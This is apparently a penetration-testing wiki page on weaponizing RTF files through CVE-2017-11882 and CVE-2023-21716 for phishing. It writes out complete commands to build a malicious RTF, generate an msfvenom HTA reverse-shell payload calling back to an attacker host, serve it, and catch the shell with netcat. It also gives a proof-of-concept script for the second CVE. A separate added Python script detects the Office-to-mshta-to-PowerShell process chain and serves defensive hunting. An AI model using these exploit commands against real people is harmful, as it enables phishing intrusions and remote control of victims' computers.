
# MS Office - RTF Files RCE

## Theory

RTF files are widely used in business communications for their rich formatting capabilities, making them a perfect disguise for malicious payloads. CVE-2023-21716 and CVE-2017-11882 are vulnerabilities within Microsoft Office that can be leveraged to execute arbitrary code when the victim opens a crafted RTF file.

This page is about weaponizing RTF files for effective phishing campaigns.

## Practice

### CVE-2017-11882

{% tabs %}
{% tab title="Exploit" %}
We may use [this exploit toolkit](https://github.com/bhdresh/CVE-2017-0199) (Python, published for CVE-2017-0199), which provides a quick and effective way to exploit the Microsoft RTF RCE vulnerability.

First, generate the malicious RTF file:

```bash
python2.7 cve-2017-0199_toolkit.py -M gen -w bad.rtf -u http://<ATTACKING_IP>/bad.hta -t RTF -x 0
```

The exploit will call and execute an HTA file, which you may generate as follows:

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f hta-psh -o bad.hta
```

Host `bad.hta` on your web server and start a listener:

```bash
# Start the web server that hosts the bad.hta file
python3 -m http.server 80

# Start the listener
rlwrap nc -lvnp <ATTACKING_PORT>
```

Finally, send the `bad.rtf` file to the target. Once the victim opens the malicious RTF file, you will get a reverse shell.
{% endtab %}
{% endtabs %}
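The chain above ends with Word handing execution to an HTA, and the `hta-psh` payload format then launches PowerShell from that HTA. On the defensive side, that parent/child sequence is the signal to hunt for in process-creation telemetry. The following script is an added example, not part of the page or of the linked toolkit; the event records are constructed, and the field names (`pid`, `ppid`, `image`, `parent_image`, `cmdline`) are an assumption that mimics a Sysmon/EDR process-creation event.

```python
"""Flag process-creation events in which an Office application launches
mshta.exe, or mshta.exe launches a shell, the sequence produced by an RTF
that pulls and runs a remote HTA.

Added example for this page; the events below are constructed and the field
names are assumed to mirror a Sysmon/EDR process-creation record.
"""
import json

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe"}
SECOND_STAGE = {"powershell.exe", "cmd.exe"}

# Constructed sample telemetry (198.51.100.10 is a documentation address)
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3000,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "WINWORD.EXE /n invoice.rtf"},
    {"pid": 4180, "ppid": 4100,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "mshta.exe http://198.51.100.10/bad.hta"},
    {"pid": 4210, "ppid": 4180,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden"},
    # Benign: a user opens a local .hta from Explorer, no Office parent
    {"pid": 5000, "ppid": 3000,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\tools\dashboard.hta"},
    # Benign: Word spawning its print helper
    {"pid": 5100, "ppid": 4100,
     "image": r"C:\Windows\splwow64.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "splwow64.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, event) pairs for suspicious process creations."""
    hits = []
    for ev in events:
        child = basename(ev["image"])
        parent = basename(ev["parent_image"])
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            hits.append(("office_spawned_mshta", ev))
        elif parent in SCRIPT_HOSTS and child in SECOND_STAGE:
            hits.append(("mshta_spawned_shell", ev))
    return hits


def summarize(events):
    """Compact view of detect(): (rule_name, pid of the flagged child)."""
    return [(rule, ev["pid"]) for rule, ev in detect(events)]


if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(rule, json.dumps(ev))
```

Both rules key on image basenames only, so a renamed copy of mshta.exe would evade them; correlating on the `ppid` chain back to the Office process (and on a URL in the mshta command line) tightens the logic at the cost of a few more lines.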

### CVE-2023-21716

{% tabs %}
{% tab title="Exploit" %}
The exploit isn't weaponized yet, but here is the Python PoC:

```python
# Builds an RTF whose font table holds 32761 entries, the oversized
# \fonttbl that the CVE-2023-21716 PoC relies on
font_table = "".join("{\\f%dA;}\n" % i for i in range(0, 32761))
rtf = "{\\rtf1{\n{\\fonttbl" + font_table + "}\n{\\rtlch no crash??}\n}}\n"

with open("file.rtf", "wb") as f:
    f.write(rtf.encode("utf-8"))
```

{% endtab %}
{% endtabs %}

